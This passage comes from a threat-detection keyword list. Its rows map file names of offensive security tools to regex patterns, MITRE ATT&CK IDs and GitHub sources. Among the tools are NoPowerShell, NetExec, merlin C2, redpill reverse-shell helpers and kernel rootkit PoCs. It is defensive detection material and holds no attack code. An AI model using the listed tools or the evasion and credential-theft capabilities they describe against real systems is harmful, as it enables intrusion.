TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*\generate_bind_fuegoshell.ps1*",".{0,1000}\\generate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*\generate_reverse_fuegoshell.ps1*",".{0,1000}\\generate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*\get_netconnections.py*",".{0,1000}\\get_netconnections\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\GetADGroupCommand.cs",".{0,1000}\\GetADGroupCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetADGroupMemberCommand.cs",".{0,1000}\\GetADGroupMemberCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetAdmin.log*",".{0,1000}\\GetAdmin\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\GetAdmin.ps1*",".{0,1000}\\GetAdmin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - 
T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\GetADObjectCommand.cs",".{0,1000}\\GetADObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetADTrustCommand.cs",".{0,1000}\\GetADTrustCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetADUserCommand.cs",".{0,1000}\\GetADUserCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetBrowsers.ps1*",".{0,1000}\\GetBrowsers\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\GetChildItemCommand.cs",".{0,1000}\\GetChildItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetClipboardCommand.cs",".{0,1000}\\GetClipboardCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetCommandCommand.cs",".{0,1000}\\GetCommandCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetComputerInfoCommand.cs",".{0,1000}\\GetComputerInfoCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetContentCommand.cs",".{0,1000}\\GetContentCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\get-desc-users.py*",".{0,1000}\\get\-desc\-users\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\GetDnsClientCacheCommand.cs",".{0,1000}\\GetDnsClientCacheCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetFullPrivs\GetFullPrivs*",".{0,1000}\\GetFullPrivs\\GetFullPrivs.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\GetFullPrivsDrv.cpp*",".{0,1000}\\GetFullPrivsDrv\.cpp.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\GetFullPrivsDrv.exe*",".{0,1000}\\GetFullPrivsDrv\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\Get-GPPPassword.ps1*",".{0,1000}\\Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\GetHelpCommand.cs",".{0,1000}\\GetHelpCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetHotFixCommand.cs",".{0,1000}\\GetHotFixCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Get-InfectedThread.ps1*",".{0,1000}\\Get\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Get-InjectedThread.ps1*",".{0,1000}\\Get\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\GetItemPropertyCommand.cs",".{0,1000}\\GetItemPropertyCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetItemPropertyValueCommand.cs",".{0,1000}\\GetItemPropertyValueCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetLocalGroupCommand.cs",".{0,1000}\\GetLocalGroupCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetLocalGroupMemberCommand.cs",".{0,1000}\\GetLocalGroupMemberCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetLocalUserCommand.cs",".{0,1000}\\GetLocalUserCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNetIPAddressCommand.cs",".{0,1000}\\GetNetIPAddressCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNetNeighborCommand.cs",".{0,1000}\\GetNetNeighborCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNetRouteCommand.cs",".{0,1000}\\GetNetRouteCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNetTCPConnectionCommand.cs",".{0,1000}\\GetNetTCPConnectionCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetNPUsers.py*",".{0,1000}\\GetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\Get-OSTokenInformation.ps1*",".{0,1000}\\Get\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Get-PassHints.ps1*",".{0,1000}\\Get\-PassHints\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\GetPasswords.ps1*",".{0,1000}\\GetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\GetProcessCommand.cs",".{0,1000}\\GetProcessCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetProcHandleDrv_x64.sys*",".{0,1000}\\GetProcHandleDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\GetPSDriveCommand.cs",".{0,1000}\\GetPSDriveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetRemoteSmbShareCommand.cs",".{0,1000}\\GetRemoteSmbShareCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. 
only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Get-ScheduledTaskComHandler.ps1*",".{0,1000}\\Get\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\GetSmbMappingCommand.cs",".{0,1000}\\GetSmbMappingCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetSmbShareCommand.cs",".{0,1000}\\GetSmbShareCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
